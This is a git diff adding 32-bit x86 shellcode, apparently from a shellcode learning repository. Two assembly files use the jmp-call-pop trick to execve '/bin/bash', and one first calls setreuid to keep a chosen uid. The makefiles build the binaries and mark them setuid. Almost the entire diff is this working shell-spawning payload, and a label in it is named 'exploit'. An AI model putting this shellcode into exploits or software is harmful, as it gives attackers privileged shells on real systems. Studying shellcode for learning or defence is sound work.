diff options
| -rw-r--r-- | exec_cmd/makefile | 5 | ||||
| -rwxr-xr-x | exec_cmd/shell | bin | 0 -> 4268 bytes | |||
| -rw-r--r-- | exec_cmd/shell.asm | 19 | ||||
| -rw-r--r-- | exec_cmd/shell.o | bin | 0 -> 528 bytes | |||
| -rw-r--r-- | exec_cmd_setuid/makefile | 5 | ||||
| -rwxr-xr-x | exec_cmd_setuid/shell | bin | 0 -> 4288 bytes | |||
| -rw-r--r-- | exec_cmd_setuid/shell.asm | 28 | ||||
| -rw-r--r-- | exec_cmd_setuid/shell.o | bin | 0 -> 592 bytes |
8 files changed, 57 insertions, 0 deletions
diff --git a/exec_cmd/makefile b/exec_cmd/makefile new file mode 100644 index 0000000..676ee34 --- /dev/null +++ b/exec_cmd/makefile @@ -0,0 +1,5 @@ +make: + nasm shell.asm -felf32 -o shell.o + ld -m elf_i386 shell.o -o shell -s + chmod u+s shell + diff --git a/exec_cmd/shell b/exec_cmd/shell Binary files differnew file mode 100755 index 0000000..9ea0d3b --- /dev/null +++ b/exec_cmd/shell diff --git a/exec_cmd/shell.asm b/exec_cmd/shell.asm new file mode 100644 index 0000000..d90d9a4 --- /dev/null +++ b/exec_cmd/shell.asm @@ -0,0 +1,19 @@ +global _start +_start: +jmp short data + +exploit: +xor eax, eax +xor ebx, ebx +xor ecx, ecx +pop edx +mov [edx + 10], eax +mov al, 11 +mov ebx, edx +xor edx, edx +int 0x80 + + +data: +call exploit +cmd: db '/bin/bash' diff --git a/exec_cmd/shell.o b/exec_cmd/shell.o Binary files differnew file mode 100644 index 0000000..50283e1 --- /dev/null +++ b/exec_cmd/shell.o diff --git a/exec_cmd_setuid/makefile b/exec_cmd_setuid/makefile new file mode 100644 index 0000000..676ee34 --- /dev/null +++ b/exec_cmd_setuid/makefile @@ -0,0 +1,5 @@ +make: + nasm shell.asm -felf32 -o shell.o + ld -m elf_i386 shell.o -o shell -s + chmod u+s shell + diff --git a/exec_cmd_setuid/shell b/exec_cmd_setuid/shell Binary files differnew file mode 100755 index 0000000..9a98c4f --- /dev/null +++ b/exec_cmd_setuid/shell diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm new file mode 100644 index 0000000..504685f --- /dev/null +++ b/exec_cmd_setuid/shell.asm @@ -0,0 +1,28 @@ +global _start +_start: +jmp short data + +exploit: + +xor edx, edx + +xor eax, eax ; set reuid +xor ebx, ebx +xor ecx, ecx +mov al, 203 +mov bx, 14005 +mov cx, 14005 +int 0x80 + +xor eax, eax +xor ebx, ebx +xor ecx, ecx +pop edx +mov [edx + 10], eax +mov al, 11 +mov ebx, cmd +int 0x80 + +data: +call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start +cmd: db '/bin/bash' diff --git a/exec_cmd_setuid/shell.o b/exec_cmd_setuid/shell.o Binary files differnew file mode 100644 index 0000000..59be327 --- /dev/null +++ b/exec_cmd_setuid/shell.o |